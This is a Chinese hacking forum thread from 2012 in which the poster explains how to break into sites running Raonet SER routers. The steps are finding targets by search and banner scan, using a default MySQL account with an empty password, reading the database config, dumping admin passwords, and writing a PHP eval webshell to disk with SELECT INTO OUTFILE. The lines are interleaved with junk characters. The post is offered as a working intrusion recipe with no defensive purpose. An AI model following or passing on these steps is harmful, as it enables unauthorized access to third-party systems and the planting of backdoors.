找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2802|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
& [( S. V4 Q7 X1 H
) q+ y4 H9 d0 l& w' I8 @( \1:google搜索'Raonet Subscriber Ethernet Router'. u* W+ b: o/ m$ {; C

- E: H1 N( ?& g2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001# E' d! Y9 I% ?8 F

/ l' `/ q# \* V3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。5 I" E6 I, }- z' x9 v7 f

% O% H. N/ J/ D# E$ u5 T1 ~//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......( m6 {: {+ Q& J& w6 ]1 Q7 F) n2 G1 R
8 o# ?, H% J* U0 q4 {6 s! x
, l( \6 ]: M. `6 Y+ u9 U

* e3 R" x* s" p入侵步骤:6 \4 s. }; z" D! h& y& w. l# m

2 y) S, r, G! m: V( E( D/ m1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php* r$ B$ o; @& r
5 B2 |+ t2 }: v& c- {
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& `! S! Z" j8 ^1 y% K7 q
3:得到密码后连接,查看GUI管理密码:) _5 \, b8 C" i  F/ k* C
use ser_500' [& n* O+ b: D! s4 ]( m/ P# ]
select id,passwd from user;
8 r4 o/ \9 n0 I9 d$ V; F' [4:通过数据库写入webshell,执行命令:% Q* g! s6 V# a3 \
use mysql;
: Q% K1 N0 B4 Pcreate table ok(cmd TEXT);
. y3 Y1 f/ l: @$ }+ ]insert into ok values("<?php @eval($_POST[cmd])?>");
! G5 L4 E) g8 z  B5 N! @& Tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 i3 m& ?* y+ D( R& [drop table ok;
8 j' V3 \9 I, u2 W9 a) m+ f
1 B+ l" G, d# `5 r1 L0 D5:连接后门shell.php
' N; ?; ^, N& k( ?4 P  s' k& i3 B
6. 搞定!4 g* }9 A# T; Y* K9 E4 E5 _) l# k

+ h+ R& n4 A, |9 J6 g
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表